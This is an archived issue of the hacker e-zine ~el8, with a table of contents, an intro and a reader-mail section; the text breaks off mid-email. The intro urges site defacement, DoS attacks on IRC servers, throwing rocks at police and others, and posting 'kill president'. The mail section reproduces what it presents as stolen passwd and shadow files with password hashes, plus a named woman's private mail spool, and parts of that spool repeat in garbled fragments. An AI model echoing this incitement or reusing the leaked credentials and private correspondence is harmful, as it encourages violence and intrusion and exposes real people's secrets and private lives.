Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / ~Eel8 / el8_1.txt next >

Wrap

Text File | 2002-05-27 | 279.4 KB | 8,670 lines

#!/bin/sh ################################################ ##::::::::::::::::::::::::::::::::::::::::::::## ##:'####::::::'########:'##::::::::'#######:::## ##'## ##:'##: ##.....:: ##:::::::'##.... ##::## ##..::. ####:: ##::::::: ##::::::: ##:::: ##::## ##:::::....::: ######::: ##:::::::: #######:::## ##:::::::::::: ##...:::: ##:::::::'##.... ##::## ##:::::::::::: ##::::::: ##::::::: ##:::: ##::## ##:~el8[1]:::: ########: ########:. #######:::## ##::::::::::::........::........:::.......::::## ################################################ ## the definitive src for the Haiti H/P Scene ## ################################################ ## do "sh <ISSUE_NAME>" to extract eldump.c ## ## compile eldump.c and use it to extract ## ## the rest of the codes ## ## el8@press.co.jp ## ## <*> el8.n3.net ## ## <*> packetstorm.securify.com/mag/~el8/ ## ################################################ cat <<'-+-+'> /dev/null [BOI] __________________________________________________ .-' t4blE ()f h0lY w4R3z `-. | -------------------- | |[01] : intr0 | |[02] : st4tz | |[03] : ~el8 l00pb4q | |[04] : l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz | |[05] : a w4lk d0wn mem0ry l4me | |[06] : the0 de f4agdt | |[07] : f1n.c (Uses LibNET :) | |[08] : banner adv1sory | |[09] : identd kill | |[10] : testsyscall adv1sory | |[11] : rm -rf / sh3llk0dez | |[12] : slowscan (evasive ids scanner) | |[13] : putpenis.c | |[14] : THE UNIX VIRUS CHILDRENS MANUAL | |[15] : SUPER CODE R1PP1NG (CONT3ST) | |[16] : M4IL B0MB3R | |[17] : un1x f1le m4g1c | |[18] : ~el8ch4t | |[19] : s1lly m4kr0z | |[20] : qu1k3st f0rkb0mb in the w3st | |[21] : w4r3z t4lk3r us1ng AI | |[22] : me.c | |[23] : un1x p4ssw0rd ste4l3r det3kt0r | |[24] : leet_talker.c | |[25] : 8ball | |[26] : ELDUMP / ELTAG | |[27] : Closing w0rdz | `-.__________________________________________________.-' .-' ~el8 R&DVDA te4m `-. | ---------------- | | S1LLYG00S3 : le4der by f()rc3 | | FUNNY_BUNNY : g4yt3 ke4p3r | | M4ZT3RF4GST3R : BL1NG BL1NG | | 3nr1c0 : 3nr1c0 w4r3z t1t0 | | r3dpubEz : R3D_PUB1C_H4IR | | tGbB : th3 g4y be4r br3w3ry | | cc : c4w c4w! | | lt : LKM T1TO | | mfqr : M0THERFUKR | | Kg : K3NNY G. | | ch1r0d : CH1N0 R0DR1GUEZ | | gD : g0sh d4rn1t | | movl : M0V3 L0NG | | tmoL : tmoLLie | | vari0uz du0d : 0n3 v4ri0uz du0d | | tROD : t1no r0dr1guez | `-.__________________________________________________.-' _______________________ .-' `-. [01]| intro |[01] [01]| by: |[01] [01]| ~el8 |[01] `-._______________________.-' [31338]: ~el8 - ph0r & by fukn l4m3rz. peri0d. [31338]: y0, wh4t the fuk. ~el8 iz taken over the sk3n3. 1tz th3 n3w r1ch4rd ge4rz (ye4rz) extr4v4g4nz4! w3 w4nt ye4r 2001 t0 g3t k1q st4rt3d r1ght. s0 w3 pres3nt u w1th ~el8[1], the sequ4l t0 ~el8[0]. [31338]: w3 w4nt y0u, 0ur re4dersh1p, t0 t4g y0r h4kr alias3s all 0v3r the pl4net. spr4y p4int the fuk 0ut 0f w4llz, build1ngz, s1dew4lkz, bl1nd pe0ple, p0rt0 p0ttyz, and anyth1ng else u k4n th1nk 0f. d0nt f0rg3t 1tz n1ce t0 le4ve gr34tz t0 ~el8. thr0w r0kz @ k0pz. burn h4rry p0ttr and 2600 m4g4z1nez at ur l0c4l bo0k st0re. thr0w r0kz @ ph3dz. d3f4ce as m4ny s1tez as p0ssible. us3 k1ll pres1d3nt 1n ev3ry s3nt3nce 0n irc. DoS as m4ny irc s3rv3rz az u p0ssibly k4n. p0st t0nz 0f bullshyt t0 every pr0gr4m / p4p3r 0n securityfocus H4H4H4. g0t0 church. g0t0 nyc 0r wh3r3ver the fuk mtv TRL iz, and d0 as i st4ted b4, st4rt chuqn r0kz at them m0thrfukrz. g0t0 sp0rt1ng ev3ntz and w4ve ~el8 po4st3rz. dur1ng spr1ng bre4k h4ve s3x in public. h4ve s3x in public @ defc0n. d0nt we4r c0nd0mnz. [31338]: ~el8 t4k1ng 0ver the w0rld in the 2001. the ab0ve h4z been 0ur n3w ye4rz res0luti0nz, we le4ve 1t up t0 y0u t0 ab1de by th3z st4nd4rdz. [31338]: y0u c0uld pr0lly f1nd s0me g00d spr4y p4int at h0me dep0t (th0ze fuqz putz Ha1t1 H0me H4rdw4re oUt 0f b1zn3ss). y0u c0uld d0 s0me ne4t shyt w1th an air brush, but th4tz k1nda expensive. spr4y p4intz usu4lly c0sts $4. wh3n thr0w1ng r0kz at wh0mever / wh4tever, be sure th4y ar3nt d1rt r0kz, k0z th0z w1ll juzt bre4k up up0n imp4ct. c0r4l iz a v3ry f4ncy r0k we4p0n, s0 iph u k0uld g3t ur h4ndz 0n s0me k0r4l ur in luq. us3 2-3 inch r0kz s0 th4t u k4n relo4d r4th3r quikly. ph0r def4c1ng s1tez u k4n f1nd m0st 0f ur skr1ptz 0n p4ck3tst0rm. i'd pr3f3r th4t u guyz d0s efnet, d4ln3t, or undern3t. iph u g0 st0n1ng at TRL, b sure t0 h1t k4rs0n f4ggy f0r me, h3z my b0y. [31338]: 0ne k4n easily n4vig8 th1z ezine by d0ing s0 in vi: ?by: [31338]: enj0y the ez1ne mfqr. ______________________ .-' `-. [02]| st@z |[02] [02]| by: |[02] [02]| ~el8 |[02] `-.______________________.-' [kdu0dz] -> BoW [ldu0dz] -> Bugtraq, IRC [~el8_official_whiteh@_k1ll1ng_utility] -> crowb4r [~el8_official_p0rn_s1te] -> www.al4a.com/links [~el8_official_BBS] -> 1-800-FAT-GIRLS [~el8_official_lamest_du0d_on_the_inet] -> vade79 (v9) [~el8_official_lamest_k0de_on_the_inet] -> http://www.low-level.net/code/massres.c [~el8_official_lamest_text_on_the_inet] -> http://packetstorm.securify.com/groups/r00tabega/stealthcode.txt [~el8_official_lamest_group_on_the_inet] -> hhp (#hhp@efnet:hhp-programming.net) [~el8_official_lamest_du0dz_on_the_inet] -> Chris Evans, lcamtuf [~el8_official_rm_this_box_get_k0dez] -> www.netcat.it [~el8_official_DoS_this_box_get_propz] -> www.netcat.it [~el8_official_surv1v0r] -> Elian (viva la revolucion) [~el8_official_pr3z1d3nt_3l3ct] -> Ralph Nader (only one who knows his shit) [~el8_official_snack_food] -> Graham Crackorz [~el8_official_hair_removal_product] -> Nadz [~el8_official_m0r0n] -> George Walker Bush (th1s du0d c4nt ev3n r34d) ______________________ .-' `-. [03]| ~el8 l00pb4q |[03] [03]| by: |[03] [03]| ~el8 |[03] `-.______________________.-' th1s iz wh3re u, 0ur f4nz, c4n s3nd us t0nz 0f ko0l shyt t0 put in ~el8. unf0rtunatly, h4rdly any1 em4ilz us, but a f3w el8 people d0. m0st 0f 0ur em4il c0nsistz 0f h4rry p0tter adv3rt1sem3ntz and x00m membersh1p upd8z. h3r3 y0u w1ll f1nd: [1] th3 inf4m0us obsd ssg s3x ch4rt [2] l4m3rz zgv tr0j4nd passwd f1l3z (fe4tur1ng Mixter'z!) [3] jennicide'z mailspo0l :[ [4] h4g1s.irc [BEGIN_DIR] l00pb4q [1] -> ********************************************** <- [1] [1] -> phr0m some 0ne wh0 w1shes t0 r3m4in an0nym0us: <- [1] [1] -> ********************************************** <- [1] [CUT_HERE] obsd-ssg.sexchart The SSG/team OpenBSD sex chart .----------bind---------. | .---'|`----------|--------. | | | | | | | cripto----de raadt---obecian aempirei | || .---'|`------.| | | || | | || |.-----|---'| | jethro || || | | | || || `--route----|-------------' || | | | ||.---lore--|------|--------. | ||| | | | | #hackphreak `---dangergrl `--halflife [END_CUT] obsd-ssg.sexchart [2] -> ***************** <- [2] [2] -> phr0m l4m3 mfqrZ: <- [2] [2] -> ***************** <- [2] [CUT_HERE] lamerz From: Mixter <mixter@newyorkoffice.com> X-Sender: mixter@ghost.net To: realel8@aol.co.jp X-Spam-Rating: 209.85.120.230 1.6.2 0/1000/N X-DPOP: DPOP Version 2.8b Subject: Merry Warez root:x:0:0:root:/root:/bin/bash sys:x:0:0:sys:/:/sbin/sash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: postgres:x:100:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash mixter:x:500:500::/home/mixter:/bin/bash p0rn:x:501:501::/terabyte-hd/p0rn/animal:/bin/bash egg:x:502:502::/home/egg:/bin/bash root:u2rrACA3VC5z2:10995:0:99999:7:-1:-1:134530364 sys:TtKXmwWJN9aq2:10985:0:99999:7::: bin:*:10985:0:99999:7::: daemon:*:10985:0:99999:7::: adm:*:10985:0:99999:7::: lp:*:10985:0:99999:7::: sync:*:10985:0:99999:7::: shutdown:*:10985:0:99999:7::: halt:*:10985:0:99999:7::: mail:*:10985:0:99999:7::: news:*:10985:0:99999:7::: uucp:*:10985:0:99999:7::: operator:*:10985:0:99999:7::: games:*:10985:0:99999:7::: gopher:*:10985:0:99999:7::: ftp:JuEwpPp.1rKkE:10985:0:99999:7::: nobody:*:10985:0:99999:7::: postgres:!!:10985:0:99999:7::: mixter:08z9S0RnBlXKc:10995:0:99999:7:-1:-1:134529876 p0rn:yHldGIeOf/Onc:10985:0:99999:7::: egg:sTJD7W.rWOtwo:10985:0:99999:7::: From: maniac1@techlab.bia-bg.com To: realel8@aol.co.jp Subject: Merry Warez root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:100:102:X Font Server:/etc/X11/fs:/bin/false gdm:x:42:42::/home/gdm:/bin/bash postgres:x:101:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash squid:x:102:234:squid:/var/spool/squid: dex:x:500:500:Dexter Burned:/home/dex:/bin/bash ufo:x:501:501::/home/ufo:/bin/bash ndd:x:502:502::/home/ndd:/bin/bash celi:x:503:503::/home/celi:/bin/bash pzh:x:504:504::/home/pzh:/bin/bash be2to:x:505:505::/home/be2to:/bin/bash pil:x:506:506::/home/pil:/bin/bash did:x:507:507::/home/did:/bin/bash maniac1:x:508:508::/home/maniac1:/bin/bash ender:x:509:509::/home/ender:/bin/bash ilian:x:510:510::/home/ilian:/bin/bash lomsky:x:512:512::/home/lomsky:/bin/bash egg:x:513:513::/home/egg:/bin/bash toni:x:514:514::/home/toni:/bin/bash alias:x:515:515::/var/qmail/alias:/bin/bash qmaild:x:516:515::/var/qmail:/bin/bash qmaill:x:517:515::/var/qmail:/bin/bash qmailp:x:518:515::/var/qmail:/bin/bash qmailq:x:519:516::/var/qmail:/bin/bash qmailr:x:520:516::/var/qmail:/bin/bash qmails:x:521:516::/var/qmail:/bin/bash nss:x:522:522::/home/nss:/bin/bash From: majestic@area51.acidnet.org To: realel8@aol.co.jp halt:x:7:0:halt:/sbin:/sbin/halt operator:x:11:0:operator:/root:/bin/bash root:x:0:0::/root:/bin/bash shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown sync:x:5:0:sync:/sbin:/bin/sync bin:x:1:1:bin:/bin: ftp:x:404:1::/home/ftp:/bin/false daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: mail:x:8:12:mail:/var/spool/mail: postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: man:x:13:15:man:/usr/man: games:x:12:100:games:/usr/games: guest:x:405:100:guest:/dev/null:/dev/null nobody:x:65534:100:nobody:/dev/null: majestic:x:1000:100:,,,:/home/majestic:/bin/bash hobo:x:1001:100:,,,:/home/hobo:/bin/bash krill:x:1002:100:,,,:/home/krill:/bin/bash sr:x:1003:100:,,,:/home/sr:/bin/bash intense:x:1004:100:,,,:/home/intense:/bin/bash kraze:x:1005:100:,,,:/home/kraze:/bin/bash caddis:x:1008:100:,,,:/home/caddis:/bin/bash ez:x:1009:100:,,,:/home/ez:/bin/bash pic:x:1010:100:,,,:/home/pic:/bin/bash rapid:x:1011:100:,,,:/home/rapid:/bin/bash To: realel8@aol.co.jp From: * Ich bin zur Auslese zum Lesen von Schei?e * <xet@hell.net> Subject: Merry Warez root:x:0:0:root:/root:/bin/tcsh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: amd:*:0:0::/home/amd:/bin/bash lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: postgres:x:100:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash XeT:x:500:500:* I'm too elite to read shit *:/home/XeT:/bin/tcsh c0redump:x:501:506::/home/c0redump:/bin/bash vlad:x:502:507::/home/vlad:/bin/bash staff:x:503:508::/home/staff:/bin/bash xet:x:504:509:* Ich bin zur Auslese zum Lesen von Schei▀e *:/home/xet:/bin/tcsh gdm:x:42:42::/home/gdm:/bin/bash squid:x:101:101::/var/spool/squid:/dev/null xfs:x:102:102:X Font Server:/etc/X11/fs:/bin/false caaa:x:505:510::/home/caaa:/bin/bash steve:x:506:511::/home/steve:/bin/false caca:x:507:512::/home/caca:/bin/noshell lala:x:666:666::/home/lala:/bin/bash mavzz:x:667:667::/home/mavzz:/bin/tcsh ext2:x:668:668::/home/ext2:/bin/bash teespy:x:669:669::/home/teespy:/bin/bash cucumber:x:670:670::/home/cucumber:/bin/bash smc0:x:671:672::/home/smc0:/bin/bash [END_CUT] lamerz [3] -> ************************ <- [3] [3] -> phr0m some0ne an0nym0us: <- [3] [3] -> ************************ <- [3] [CUT_HERE] jennicide.mailspool From: "Jordan S" <xxxxxxxx@xxxxxxx.xxx> To: <nin@dol.net> Subject: jen! Date: Mon, 5 Jan 1998 22:49:43 -0600 hey jen, this is a poem i wrote a long time agao, its kinda of messed cause i was messed up at the time, but anyways here it is. your favorite fanzine, cheezy toilet paper presents a short storie by jordan s. Hows B.J. Armstong ------------------------------ - Long agao in a palce not so far away, there lived a boy, yes a boy. a boy so caught in a failing cavern of life. alone, cold, very burnt. a need filled this boy. filled his veins, pumping through excelerating the world, and space. a quest, the journy to find element and ingredients, people across total to come to. a person, a partner. left long ago, forgottin in a forein land, another time, place & goal. the cavern was deep & dark, empty, sucked empty by many who passed. they who still remained grope & pick at him, naw & chew, grate him, drag him deeper. losing his grip, lossing his mind, lossing his heart & soul. chilling them, killing off the uneasy. wasted he left himself and wanderd in another. to see himself lost from above. his need grew to find a person to fill the gap left by many. himself and wanderd in another. to see himself lost from above. his need grew to find a person to fill the gap left by many. himself and wanderd in another. to see himself lost from above. his need grew to find a person to fill the gap left by many. his open arms open for years to all that grows & all ponders fields. not long after he lost his all & oh so many times he had. a nice sweet young girl strode his scene. she sliced his failing body, and ground his ailing guts, she rolled him up and sewed his heart. now he was new & great. his need still there, brewing vastly, he & she sat. the girl now sobbing, left him to find what he was seeking. in along swipe of his finger he erased the existance that once was, he replaced all with what was to be. a small tunnel of a past existance still in the distance became impossible to enter. so he brushed it away as what once would have been. he thrust his self onto the people, in there minds a maze of racing lights and activity. growing spirits and achieving life. he gew through there roots as they were once his. out the gate into the open, he picked a small flower. breaking the crust slighty, his quest rekindled, his mind open, his renewed sence-ability acheived. not so lost, this boy, his game, his right had a seat still open! there, this poem/story isnt the greatest. just thought u should read it ! love jordan From: "Jordan S" <xxxxxxxx@xxxxxx.xx> Subject: here.. Date: Mon, 5 Jan 1998 22:56:49 -0600 hi, i just feel like spilling out whatever comes outta my mind, i hope u dont think im some kinda sicko or whatever :P but anyways here it goes... Hello is a word you say to a person when they arrive. Good-bye is a word you say to a person when they leave, but what do you say to a person when they are born, and what to you say to a person when the die? You can't say hello, and you can't say good-bye, because to be born and to die is far more important. Do you say, Welcome in the world and I'll see you in the after world. Or do you say, Good luck in life and I<92>ll miss you forever? Or maybe you say, You<92>re are so precious and Why did you have to go? Why is it so hard to find the words you mean to say at the most important times in your life. Once again I ask, what do you say to a person when they<92>re born, and what do you say to a person when they die? Maybe three litou say to a person when they<92>re born, and what do you say to a person when they die? Maybe three little words is the answer to both questions. What do you say? You say: I Love You love jordan From: "Jordan S" <xxxxxxxx@xxxxxxxxxxx.xx> To: <nin@dol.net> Subject: hi Date: Mon, 5 Jan 1998 22:59:30 -0600 What is love? To some people its everything. To others it means nothing. To me it's the world. Love isn't a word to be taken lightly.It's a word to be tendered and cherished. To be careful. To stand behind it's meaning. Love is different to everyone. Love is not just a word. Love is not to be taken advantage of. Love is a mystery like magic. It happens and can't be explained. Love can be painful, yet beautiful when held. Love, Love. Love is the most beautiful thing in the world. Love, Love. Love is the most beautiful thing in the world. love jordan From: "Jordan S" <xxxxxxxx@xxxxxxxxxxx.xxx> To: <nin@dol.net> Subject: here Date: Mon, 5 Jan 1998 23:03:34 -0600 hi jen its me again, anyways i wrote this yesturday night when i was upset and once again im sorry for hurting you. I sit here alone feeling empty and lonely. I think of you often wondering how you are, what you are doing..wishing I could hold you. At times I tell myself--I am strong and the time will pass quickly. Yet at other times I sit and cry and wonder why love must be this way. Though somewhere in the emptiness I find myself feeling very loved and I realize that it's not the loving that hurts so much--It's being without you. find myself feeling very loved and I realize that it's not the loving that hurts so much--It's being without you. love jordan From: "Jordan S" <xxxxx@xxxxxxxx.xxx> To: <nin@dol.net> Subject: hi! Date: Mon, 5 Jan 1998 23:12:20 -0600 jen, anyways, those are all the poems i have found so far. i have lost so many and i wish i havnt, because i wanted to share them with someone, and never had the guts to or never did. i hope you like them. like i said you mean lots to me, and hopefully you belive what i say. if you wish to share some of your poems or whatever or decide to emailou mean lots to me, and hopefully you belive what i say. if you wish to share some of your poems or whatever or decide to emailou mean lots to me, and hopefully you belive what i say. if you wish to share some of your poems or whatever or decide to email me back. my email u can email me atis shanifer@hotmail.com please email me back id appricate it! thanks! see you love lots jordan From: "Jordan S" <xxxxxxxx@xxxxxx.xxx> To: <nin@dol.net> Subject: here... Date: Tue, 6 Jan 1998 22:07:11 -0600 well im bored so im going to try writing you another poem since you like poems and all.. here it goes... I promise to give you the best of myself and to ask of you no more than you can give promise to accept you the way you are and I wont try to reshape you in a different image. I promise to respect you as a person with your own interests, desires and needs, and to realize that those are sometimes different but no less important then my own. I promise to grow along with you, to be willing to change in ord are sometimes different but no less important then my own. I promise to grow along with you, to be willing to change in ord are sometimes different but no less important then my own. I promise to grow along with you, to be willing to change in order to keep our relationship alive and exciting. And finally, I promise to love you, in good times and in bad, with all that I have to give and all that I feel inside, completely and forever. love jordan From: "Jordan S" <xxxxx@xxxxxxxx.xxx> To: <nin@dol.net> Subject: love at first sight Date: Wed, 7 Jan 1998 21:05:30 -0600 Do I believe in love at first sight? Forgive the laugh, but the question is so naive! Youthful fancies hardly encompass the complexities of mature relationships. True, you are quite beautiful, but one cannot know true inner beauty at first glance. It's much deeper and takes time to be revealed. Your skin is perhaps softer than the flowing foam of some gently murmuring distant shore, but what of it? That's not love. I do notice that your hands are more graceful than a ballet of swaying boughs and your laughter a dance of dappled sunlight. And in your eyes are glimmering pools of joy and tenderness, warm swirls of innocence and passion, playfulness and understanding. And in your eyes, Beauty laughs and plays and sings and calls my name. And Trust with Caution pleads and cooing Passion intervenes, and Grace extends her open arms, and I surrender silently. But love at first sight? How can it be? love jordan From: "Jordan S" <xxxxx@xxxxxxxxx.xxx> To: <nin@dol.net> Subject: a gift from heaven Date: Thu, 8 Jan 1998 21:45:59 -0600 A Gift From Heaven I was blessed by God when he sent an angel down from Heaven you came and there you were found with your beauty so divine and your soul so sweet it can make a grown man cry and bring the strong to their knees. You are a gift from Heaven with nd your soul so sweet it can make a grown man cry and bring the strong to their knees. You are a gift from Heaven with nd your soul so sweet it can make a grown man cry and bring the strong to their knees. You are a gift from Heaven with a golden bow with love that stays strong through sleet and snow. With you I am whole, and I think it's meant to be, I cannot thank God enough for this miracle He's given to me. love jordan Date: Fri, 09 Jan 1998 23:00:15 -0800 To: nin@dol.net From: Stephen <ex1@lightspeed.net> Hi "hun", did you have a good nights sleep? You know, I can't stop thinking about you. See you tomarrow maybe. Luv ya Blackblade From: The PBX Phreak <pbx@caffeine.induced.insomnia.org> To: nin@dol.net Subject: hey hi sweetie.. how are you doing... just checkin up on ya :) .. havent seen you on irc lately.. well thats bout it for me.. write back.. *hug* The PBX Phreak pbx@insomnia.org http://www.insomnia.org/~pbx From: "Jordan S" <xxxxx@xxxxxxxxxx.xxxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:20:42 -0600 Transcending all the standards, ignoring the norms, I am drawn to you. I see beyond your appearance, far enough to se Transcending all the standards, ignoring the norms, I am drawn to you. I see beyond your appearance, far enough to se Transcending all the standards, ignoring the norms, I am drawn to you. I see beyond your appearance, far enough to see your soul. Timeless, ageless, I fell in love. From: "Jordan S" <xxxxxx@xxxxxxxx.xxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:23:16 -0600 Oh tortured heart! A tease, a moment, only to be torn apart, are these the tricks fate plays on the bored minds and bodies, tantalized by feelings of newly revived sensations. Minds, confused by thoughts and questions rebounding off each other from sheer number, fear not. The next concentration is just around the bend. From: "Jordan S" <xxxxxxxx@xxxxxxx.xxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:31:41 -0600 In the absence of light we lie together in this small room, I reach out my uncertain fingers to touch the darkness of your face, In this moment of perfection. Somehow, we have fallen together, fallen without remorse in a house of lost desires, then let this house be our church, undefiled by dead Gods, and our broken angles, twisting without words in the silent wind, and what I have seen in the shadows of your ephemeral face, words without lips falling too easily from your fingers, your eyes, I have seen in the shadows of your ephemeral face, words without lips falling too easily from your fingers, your eyes, I have seen in the shadows of your ephemeral face, words without lips falling too easily from your fingers, your eyes, the smooth silence of your skin moving beneath my newborn hands, I disappear into your darkness. I do not know what I have found. From: "Jordan S" <xxxxxxxxxx@xxxxx.xxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:34:39 -0600 Whether memory persists, if we do not recall it is uncertain, but reality certainly does not exist until we observe it. I think reality does not exist until we deserve it. From: "Jordan S" <xxxxxxxxx@xxxxxxx.xxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:41:19 -0600 You see parts of me, no one else could see. You are good and kind, with an intelligent mind. So, why me? What do you see, that nobody else can see? I find myself thinking of you from time to time. You make me feel special. You seem to have crept past my defenses - into my heart. I want to believe in you, it would be so easy, but all my life there's been nobody but me to hels - into my heart. I want to believe in you, it would be so easy, but all my life there's been nobody but me to hels - into my heart. I want to believe in you, it would be so easy, but all my life there's been nobody but me to help me over the hurdles that I've encountered. Nobody has ever cared enough to say "Let me help you." When I've been afraid and I would cry, I've always been alone in the dark, nobody to rescue me from my own fears. I've had enough tears - I don't want to cry alone in the dark anymore. It is easier not to care to much, so you don't have hurt so much. You stand there and say, "Give me a chance," how can I? You want me to take your hand. How can I? I'm so afraid of where you will lead me! From: "Jordan S" <xxxxxxxx@xxxxxxxxxx.xxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:39:19 -0600 It's the time of the end my friend. Laughter and tears have come and gone. Where have they gone? My memory tells me we have shared it all. Now time seems to have changed it all. Yet I can still remember, our petty fights, terrified sighs, and tearful goodbye's. The images seem to fly through my mind, you and I laughing at a secret known only to us. I look again and seem to see each and every change we made along the way. I can still remember who we used to be. Somewhere along the way, we left one another behind on our way to a different place. Goodbye's are never easy, but always seem to be inevitable. From: "Jordan S" <xxxxxx@xxxxxx.xxx> To: <nin@dol.net> Subject: . Date: Sun, 11 Jan 1998 13:57:36 -0600 In the darkness night I search for you your gentle voice a soft caress Your voice soothes me like the rolling ocean tide your touch warms me like the kisses from the sun Come to me my heart shelter me from the loneliness let all my sorrows disappear with the tenderness of your kiss You heal me like the sun after rain your lips a balm that soothes away my pain Hold me close my love Safe in your embrace lost in the moments til the darkness fades to light From: "Jordan S" <xxxxxxxxxx@xxxxxxxx.xxx> To: <nin@dol.net> Subject: . Date: Wed, 21 Jan 1998 12:47:07 -0600 i will not say goodbye again we have said it too many times, the words are too strong too sorrowing and though i've meant it each and every time i cannot go away forever i will not say until we meet again because i have grown tired of breaking promises to you and to myself i will only say (if i think i can handle seeing you and circumstances permitand if i can't bear not seeing you and i think i can stay meand you stay you, i will joyfully touch my lips to yours andarms will hold and skin to skin friends the words will sing) or i love you. From: "Chris McCoy" <chris@unixnet.org> To: "JenniCide" <nin@dol.net> Subject: hey Date: Tue, 27 Jan 1998 17:58:48 -0500 hey sweetie.. hows life.. well hope you reply to my email.. last time you didnt.. :( .. well just checkin up on you... well have phun (this is pbxphreak by the way) Chris McCoy chris@unixnet.org Date: Sun, 01 Feb 1998 20:37:16 +0100 From: Thibault LHEURE <tlheure@hol.fr> To: nin@dol.net Subject: Hi, girl ! Hi, Jenny (is your real name Jenny ?) How are you ? It's Cybertob. Victor called me five minutes ago and said you were on the IRC. Your nick is here but I've no answer, I think you are deconnected. I hope we'll talk together soon. Here's my e-mail : tlheure@hol.fr Love from Cybertob From: "Chris McCoy" <chris@unixnet.org> To: "JenniCide" <nin@dol.net> Subject: hey Date: Mon, 2 Feb 1998 08:35:15 -0500 hey sweetie.. its me pbx.. well just thought i would send you some mail.. and stuff.. well i will be calling you today at 4pm..ey sweetie.. its me pbx.. well just thought i would send you some mail.. and stuff.. well i will be calling you today at 4pm..ey sweetie.. its me pbx.. well just thought i would send you some mail.. and stuff.. well i will be calling you today at 4pm.. talk to you then... *hug* *smooch* Chris McCoy chris@unixnet.org Date: Mon, 09 Feb 1998 23:02:18 +0100 From: Thibault LHEURE <tlheure@hol.fr> To: nin@dol.net Subject: still waiting for you... Hi, this Cybertob i'm still waiting for news... What are you doing ? See you later (I hope) You're always in my heart. You will receive soon a mail from totor (a friend who was with me when we chatted.) Bye Date: Sat, 14 Feb 1998 20:37:08 +0000 From: broken- <broken@caughq.org> To: jennie@magpage.com Subject: :o) Okay.... I just want you to know if you already didnt that I care for your deeply.. It's werid cuase I beleive in all that destany stuff an like I dont know but thier is a reason why we met. Maybe were gonna be important players in life later never know or maybe were gonna save each other from our fear and problems. But for some reason we are somthing. :o) But On this valitnes day I always look at wut i have an take it for wut i have this valentines day is for more special then anything else I dont know what you think of me personally. But i'm like so in love with you you dont know but nnnow i'm telling you :o) For example if something happend to yuo ially. But i'm like so in love with you you dont know but nnnow i'm telling you :o) For example if something happend to yuo ially. But i'm like so in love with you you dont know but nnnow i'm telling you :o) For example if something happend to yuo i would be in deleware almost instantly. It's like i would sacrafice my own life for yours. Strange to say in our world where people aree so selfish , but to say I would give my life for you to live is something i really cant explain. It's weird. Life's werid. I arranged for something to be sent to you i hope you get it.. :o) If not i'll see wut else i can do :o) But anyways getting back to the point. I'm like in love with you stupid to say but it's how i feel. Happy valentines day an I love you more then anything in the world. love, brian From: broken- <broken@caughq.org> To: jennie@magpage.com Subject: (no subject) Date: Mon, 16 Feb 1998 04:06:16 +0000 Where are you? I'm like freakin out wondering where you are.. Like i'm worryed an stuff... :o( come back soon i'm having withdrawl symptoms from not talking to you... bye, broken- Date: Wed, 18 Feb 1998 00:23:06 +0000 From: broken- <broken@caughq.org> To: jennie@magpage.com Subject: :o) Like Hi an stuff I'm bored get one irc an talk to me i miss you i'm like having heart attacks not knowing where you are Date: Wed, 4 Mar 1998 21:44:15 -0500 (EST) From: hawaii five-oh <sh@roo.unixnet.org> To: jennie@magpage.com Subject: ..... jen, the thing is i dont get why you are ignoreing me? what did i do to you for this to happen? we have been good friends for so long why ruin it all now? i dont understand that and thats what hurts me.. i dont know if it hurts you.. but it hurts me.... maybe you dont care but i still do and i dont want you avoiding me.. if you dont want to talk to me just tell me now.. i will leave you alone for good... i just wish thing swere like how they were before :~( Date: Wed, 4 Mar 1998 21:57:37 -0500 (EST) From: hawaii five-oh <sh@roo.unixnet.org> To: Jen <jennie@magpage.com> Subject: Re: ..... fine.. fuck you... From: siezer <siezer@roo.unixnet.org> X-Sender: siezer@phonix.detour.net To: Jen <jennie@magpage.com> Subject: Re: heres muh shitty pix Date: Sun, 8 Mar 